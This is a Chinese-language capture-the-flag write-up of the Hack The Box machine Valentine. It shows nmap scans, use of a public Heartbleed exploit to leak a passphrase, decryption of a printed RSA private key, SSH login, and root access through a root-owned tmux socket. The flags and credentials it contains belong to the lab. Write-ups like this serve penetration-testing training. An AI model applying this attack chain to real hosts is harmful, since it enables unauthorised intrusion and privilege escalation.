Valentine-htb-writeup

0x00 靶场技能介绍

章节技能:Heartbleed漏洞、base64解码、16进制解码、openssl rsa 解密、ssh参数配置、.bash_history文件敏感信息泄露、tmux错配提权

参考链接:https://www.mytechonit.com/post/hack-the-box-valentine

参考连接:https://0xdf.gitlab.io/2018/07/28/htb-valentine.html

0x01 用户权限获取

1、常规流程,获取下靶机IP地址:10.10.10.79

2、端口扫描结果汇总下,看看都有哪些信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -min-rate 10000 -p- 10.10.10.79
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -min-rate 10000 -p- -sU 10.10.10.79
PORT     STATE SERVICE
5353/udp open  zeroconf

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sT -sV -O -p22,80,443,5353 10.10.10.79
PORT     STATE  SERVICE  VERSION
22/tcp   open   ssh      OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
80/tcp   open   http     Apache httpd 2.2.22 ((Ubuntu))
443/tcp  open   ssl/http Apache httpd 2.2.22 ((Ubuntu))
5353/tcp closed mdns

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sT -sV -O -p5353 -sU  10.10.10.79
PORT     STATE  SERVICE VERSION
5353/tcp closed mdns
5353/udp open   mdns    DNS-based service discovery

──(kali㉿kali)-[~/桌面]
└─$ sudo nmap --script=vuln -p22,80,443,5353 10.10.10.79
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-04 21:31 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.79
Host is up (0.27s latency).

PORT     STATE  SERVICE
22/tcp   open   ssh
80/tcp   open   http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-enum: 
|   /dev/: Potentially interesting directory w/ listing on 'apache/2.2.22 (ubuntu)'
|_  /index/: Potentially interesting folder
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
443/tcp  open   https
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| ssl-heartbleed: 
|   VULNERABLE:
|   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|           
|     References:
|       http://cvedetails.com/cve/2014-0160/
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
|_      http://www.openssl.org/news/secadv_20140407.txt 
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
| ssl-ccs-injection: 
|   VULNERABLE:
|   SSL/TLS MITM vulnerability (CCS Injection)
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
|       does not properly restrict processing of ChangeCipherSpec messages,
|       which allows man-in-the-middle attackers to trigger use of a zero
|       length master key in certain OpenSSL-to-OpenSSL communications, and
|       consequently hijack sessions or obtain sensitive information, via
|       a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|           
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
|       http://www.openssl.org/news/secadv_20140605.txt
|_      http://www.cvedetails.com/cve/2014-0224
|_http-dombased-xss: Couldn't find any DOM based XSS.
| ssl-poodle: 
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  BID:70574  CVE:CVE-2014-3566
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|     References:
|       https://www.imperialviolet.org/2014/10/14/poodle.html
|       https://www.openssl.org/~bodo/ssl-poodle.pdf
|       https://www.securityfocus.com/bid/70574
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
5353/tcp closed mdns

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap --script=vuln -p5353 -sU  10.10.10.79
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-04 21:34 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.79
Host is up (0.28s latency).

PORT     STATE SERVICE
5353/udp open  zeroconf

3、除了常规的端口外,我们发现了个udp端口5353,根据扫描出来的信息,他其实是 DNS-based service discovery 一个DNS的本地解析服务。

4、以前没接触过,这里简单记录下。

多播 DNS (mDNS) 是一种**零配置协议**,允许你在没有传统单播 DNS 服务器的情况下,在本地网络上执行类似 DNS 的操作。该协议使用与 DNS 相同的 API、数据包格式和操作语义,允许你解析本地网络上的域名。**DNS 服务发现 (DNS-SD)** 是一种协议,允许客户端使用标准 DNS 查询在域中**发现命名的服务实例列表**(例如 test._ipps._tcp.local 或 linux._ssh._tcp.local)。DNS-SD 最常与 mDNS 结合使用,但并不依赖于它。它们都被许多物联网设备使用,例如网络打印机、Apple TV、Google Chromecast、网络附加存储 (NAS) 设备和摄像头。 **默认端口:**5353/UDP

5、枚举下5353端口信息瞅瞅。

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -Pn -sUC -p5353 10.10.10.79
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-04 21:53 CST
Nmap scan report for 10.10.10.79
Host is up (0.28s latency).

PORT     STATE SERVICE
5353/udp open  zeroconf
| dns-service-discovery: 
|   9/tcp workstation
|     Address=10.10.10.79 dead:beef::5c52:5f2c:f062:c369
|   22/tcp udisks-ssh
|_    Address=10.10.10.79 dead:beef::5c52:5f2c:f062:c369

在漏洞上主要是涉及伪造/中间人攻击、滥用等,这里不做过多研究了。

参考链接:https://book.hacktricks.xyz/v/cn/network-services-pentesting/5353-udp-multicast-dns-mdns

6、我们回到正题,首页是一个图片,其他什么信息都没有。

7、扫描下目录,瞅瞅有什么信息没有

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(kali㉿kali)-[~]
└─$ dirsearch -u http://10.10.10.79/           

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /home/kali/.dirsearch/reports/10.10.10.79/-_23-12-04_21-55-47.txt

Error Log: /home/kali/.dirsearch/logs/errors-23-12-04_21-55-47.log

Target: http://10.10.10.79/

[21:55:47] Starting: 
                                      
[21:57:05] 301 -  308B  - /dev  ->  http://10.10.10.79/dev/ 
[21:57:05] 200 -    1KB - /dev/ 
[21:57:20] 200 -   38B  - /index.php
[21:57:20] 200 -   38B  - /index
[21:57:21] 200 -   38B  - /index.php/login/ 

Task Completed

8、还是获取到一些信息的,查看了/index.php/login/目录下,还是什么东西都没有,但是在/dev/目录下,获取到了一些信息。

9、查看下两个信息都是什么内容

Hype_key

notes.txt

1
2
3
4
5
6
7
8
To do:

1) Coffee.
2) Research.
3) Fix decoder/encoder before going live.
4) Make sure encoding/decoding is only done client-side.
5) Don't use the decoder/encoder until any of this is done.
6) Find a better way to take notes.

10、看起来是让我们对Hype_key文件进行解码之类的操作

11、编码解码确实触及到我的知识盲区了,get下别人的writeup瞅两眼下

12、突然有个记忆突击了下我,这个里面的 xxd好熟悉

13、我说我记得我学过,在HTB的学院平台上,看来这块的知识,需要再巩固下了,接下来我们解码下Hype_key文件。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
shiyan@InfoSec Desktop % cat hype_key | xxd -p -r
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46

DbPrO78kegNuk1DAqlAN5jbjXv0PPsog3jdbMFS8iE9p3UOL0lF0xf7PzmrkDa8R
5y/b46+9nEpCMfTPhNuJRcW2U2gJcOFH+9RJDBC5UJMUS1/gjB/7/My00Mwx+aI6
0EI0SbOYUAV1W4EV7m96QsZjrwJvnjVafm6VsKaTPBHpugcASvMqz76W6abRZeXi
Ebw66hjFmAu4AzqcM/kigNRFPYuNiXrXs1w/deLCqCJ+Ea1T8zlas6fcmhM8A+8P
OXBKNe6l17hKaT6wFnp5eXOaUIHvHnvO6ScHVWRrZ70fcpcpimL1w13Tgdd2AiGd
pHLJpYUII5PuO6x+LS8n1r/GWMqSOEimNRD1j/59/4u3ROrTCKeo9DsTRqs2k1SH
QdWwFwaXbYyT1uxAMSl5Hq9OD5HJ8G0R6JI5RvCNUQjwx0FITjjMjnLIpxjvfq+E
p0gD0UcylKm6rCZqacwnSddHW8W3LxJmCxdxW5lt5dPjAkBYRUnl91ESCiD4Z+uC
Ol6jLFD2kaOLfuyee0fYCb7GTqOe7EmMB3fGIwSdW8OC8NWTkwpjc0ELblUa6ulO
t9grSosRTCsZd14OPts4bLspKxMMOsgnKloXvnlPOSwSpWy9Wp6y8XX8+F40rxl5
XqhDUBhyk1C3YPOiDuPOnMXaIpe1dgb0NdD1M9ZQSNULw1DHCGPP4JSSxX7BWdDK
aAnWJvFglA4oFBBVA8uAPMfV2XFQnjwUT5bPLC65tFstoRtTZ1uSruai27kxTnLQ
+wQ87lMadds1GQNeGsKSf8R/rsRKeeKcilDePCjeaLqtqxnhNoFtg0Mxt6r2gb1E
AloQ6jg5Tbj5J7quYXZPylBljNp9GVpinPc3KpHttvgbptfiWEEsZYn5yZPhUr9Q
r08pkOxArXE2dj7eX+bq65635OJ6TqHbAlTQ1Rs9PulrS7K4SLX7nY89/RZ5oSQe
2VWRyTZ1FfngJSsv9+Mfvz341lbzOIWmk7WfEcWcHc16n9V0IbSNALnjThvEcPky
e1BsfSbsf9FguUZkgHAnnfRKkGVG1OVyuwc/LVjmbhZzKwLhaZRNd8HEM86fNojP
09nVjTaYtWUXk0Si1W02wbu1NzL+1Tg9IpNyISFCFYjSqiyG+WU7IwK3YU5kp3CC
dYScz63Q2pQafxfSbuv4CMnNpdirVKEo5nRRfK/iaL3X1R3DxV8eSYFKFL6pqpuX
cY5YZJGAp+JxsnIQ9CFyxIt92frXznsjhlYa8svbVNNfk/9fyX6op24rL2DyESpY
pnsukBCFBkZHWNNyeN7b5GhTVCodHhzHVFehTuBrp+VuPqaqDvMCVe1DZCb4MjAj
Mslf+9xK+TXEL3icmIOBRdPyw6e/JlQlVRlmShFpI8eb/8VsTyJSe+b853zuV2qL
suLaBMxYKm3+zEDIDveKPNaaWZgEcqxylCC/wUyUXlMJ50Nw6JNVMM8LeCii3OEW
l0ln9L1b/NXpHjGa8WHHTjoIilB5qNUyywSeTBF2awRlXH9BrkZG4Fc4gdmW/IzT
RUgZkbMQZNIIfzj1QuilRVBm/F76Y/YMrmnM9k/1xSGIskwCUQ+95CGHJE8MkhD3
-----END RSA PRIVATE KEY-----%                             ssshiyan@InfoSec Desktop %

14、这里章节有点困难了,我参考这writeup先把user.txt获取了吧。

15、把解码的文件放到 hype_key_encrypted 文件中,并使用openssl进行解密下,中间提示输入密码,这里输入 heartbleedbelievethehype 即可

1
2
3
4
5
6
shiyan@InfoSec ~ % cat hype_key | xxd -r -p > hype_key_encrypted

┌──(kali㉿kali)-[~/桌面]
└─$ openssl rsa -in hype_key_encrypted -out hype_key_decrypted
Enter pass phrase for hype_key_encrypted:
writing RSA key

16、这里的密码是从一开始nmap的漏洞脚本扫描的 heartbleed 中获取的

1
The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.

17、我们使用search进行搜索该漏洞

1
2
3
4
5
6
7
8
9
10
11
┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit Heartbleed      
------------------------------------------- ---------------------------------
 Exploit Title                             |  Path
------------------------------------------- ---------------------------------
OpenSSL 1.0.1f TLS Heartbeat Extension - ' | multiple/remote/32764.py
OpenSSL TLS Heartbeat Extension - 'Heartbl | multiple/remote/32745.py
OpenSSL TLS Heartbeat Extension - 'Heartbl | multiple/remote/32791.c
OpenSSL TLS Heartbeat Extension - 'Heartbl | multiple/remote/32998.c
------------------------------------------- ---------------------------------
Shellcodes: No Results

18、把第一个漏洞的exp给下载下来

1
2
3
4
5
6
7
8
9
┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit -m multiple/remote/32764.py
  Exploit: OpenSSL 1.0.1f TLS Heartbeat Extension - 'Heartbleed' Memory Disclosure (Multiple SSL/TLS Versions)
      URL: https://www.exploit-db.com/exploits/32764
     Path: /usr/share/exploitdb/exploits/multiple/remote/32764.py
    Codes: CVE-2014-0346, CVE-2014-0160, OSVDB-105465
 Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/kali/桌面/32764.py

19、运行下exp来获取下信息

1
2
3
4
5
6
┌──(kali㉿kali)-[~/桌面]
└─$ python2 32764.py 10.10.10.79
Trying SSL 3.0...
Connecting...
Sending Client Hello...
Waiting for Server Hello...

20、在这里有个base64的内容,解码出来,就是上面的呢个密码了

1
2
3
┌──(kali㉿kali)-[~/桌面]
└─$ echo aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg== | base64 -d
heartbleedbelievethehype

21、说实话这里,有点CTF了,根据首页图片和靶场名称,结合扫描出来的这个漏洞,获取到解密的秘钥。i don’t like CTF

22、既然都有看id_rsa了,那就ssh登录,获取下第一个flag吧。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(kali㉿kali)-[~/桌面]
└─$ ssh hype@10.10.10.79 -i hype_key_decrypted
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Fri Feb 16 14:50:29 2018 from 10.10.14.3
hype@Valentine:~$ 
hype@Valentine:~$ pwd
/home/hype
hype@Valentine:~$ ls
Desktop    Downloads  Pictures  Templates  Videos
Documents  Music      Public    user.txt
hype@Valentine:~$ cat user.txt 
c531325996c71c033e0b49e967033373
hype@Valentine:~$

23、这里我登录的时候试了好几遍,都没成功,最后实在没办法了,我参考了评论区的办法,我解决了这个问题

0x02 系统权限获取

24、实际上做到这里的时候,我已经被那个ssh给弄疲惫了。。。

25、查看本地 .bash_history 文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
hype@Valentine:~$ ls -la
total 148
drwxr-xr-x 21 hype hype  4096 Aug 25  2022 .
drwxr-xr-x  3 root root  4096 Dec 11  2017 ..
-rw-------  1 hype hype   131 Feb 16  2018 .bash_history
-rw-r--r--  1 hype hype   220 Dec 11  2017 .bash_logout
-rw-r--r--  1 hype hype  3486 Dec 11  2017 .bashrc
drwx------ 11 hype hype  4096 Dec 11  2017 .cache
drwx------  9 hype hype  4096 Dec 11  2017 .config
drwx------  3 hype hype  4096 Dec 11  2017 .dbus
drwxr-xr-x  2 hype hype  4096 Aug 25  2022 Desktop
-rw-r--r--  1 hype hype    26 Dec 11  2017 .dmrc
drwxr-xr-x  2 hype hype  4096 Dec 11  2017 Documents
drwxr-xr-x  2 hype hype  4096 Dec 11  2017 Downloads
drwxr-xr-x  2 hype hype  4096 Dec 11  2017 .fontconfig
drwx------  3 hype hype  4096 Dec 11  2017 .gconf
drwx------  4 hype hype  4096 Dec 11  2017 .gnome2
-rw-rw-r--  1 hype hype   132 Dec 11  2017 .gtk-bookmarks
drwx------  2 hype hype  4096 Dec 11  2017 .gvfs
-rw-------  1 hype hype   636 Dec 11  2017 .ICEauthority
drwxr-xr-x  3 hype hype  4096 Dec 11  2017 .local
drwx------  3 hype hype  4096 Dec 11  2017 .mission-control
drwxr-xr-x  2 hype hype  4096 Dec 11  2017 Music
drwxr-xr-x  2 hype hype  4096 Dec 11  2017 Pictures
-rw-r--r--  1 hype hype   675 Dec 11  2017 .profile
drwxr-xr-x  2 hype hype  4096 Dec 11  2017 Public
drwx------  2 hype hype  4096 Dec 11  2017 .pulse
-rw-------  1 hype hype   256 Dec 11  2017 .pulse-cookie
drwx------  2 hype hype  4096 Dec 13  2017 .ssh
drwxr-xr-x  2 hype hype  4096 Dec 11  2017 Templates
-rw-r--r--  1 root root    39 Dec 13  2017 .tmux.conf
-rw-rw-r--  1 hype hype    33 Dec  4 05:26 user.txt
drwxr-xr-x  2 hype hype  4096 Dec 11  2017 Videos
-rw-------  1 hype hype     0 Dec 11  2017 .Xauthority
-rw-------  1 hype hype 12173 Dec 11  2017 .xsession-errors
-rw-------  1 hype hype  9659 Dec 11  2017 .xsession-errors.old
hype@Valentine:~$ cat .bash_history 

exit
exot
exit
ls -la
cd /
ls -la
cd .devs
ls -la
tmux -L dev_sess 
tmux a -t dev_sess 
tmux --help
tmux -S /.devs/dev_sess 
exit
hype@Valentine:~$

26、查看下 tmux 的进程

1
2
3
4
hype@Valentine:~$ ps aux | grep tmux
root       1013  0.0  0.1  26416  1688 ?        Ss   05:26   0:03 /usr/bin/tmux -S /.devs/dev_sess
hype       5036  0.0  0.0  13576   932 pts/0    S+   07:52   0:00 grep --color=auto tmux
hype@Valentine:~$

27、直接使用该命令进行提权

1
2
3
4
5
6
7
8
9
10
hype@Valentine:~$ tmux -S /.devs/dev_sess
[exited]

root@Valentine:/home/hype# id
uid=0(root) gid=0(root) groups=0(root)
root@Valentine:/home/hype# id
uid=0(root) gid=0(root) groups=0(root)
root@Valentine:/home/hype# cat /root/root.txt
82d86df32749b04891ebee1cf8e07ff2
root@Valentine:/home/hype# id

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/127

打靶记
#shooting-range
Valentine-htb-writeup
https://sh1yan.top/2023/12/04/Valentine-htb-writeup/
作者
shiyan
发布于
2023年12月4日
许可协议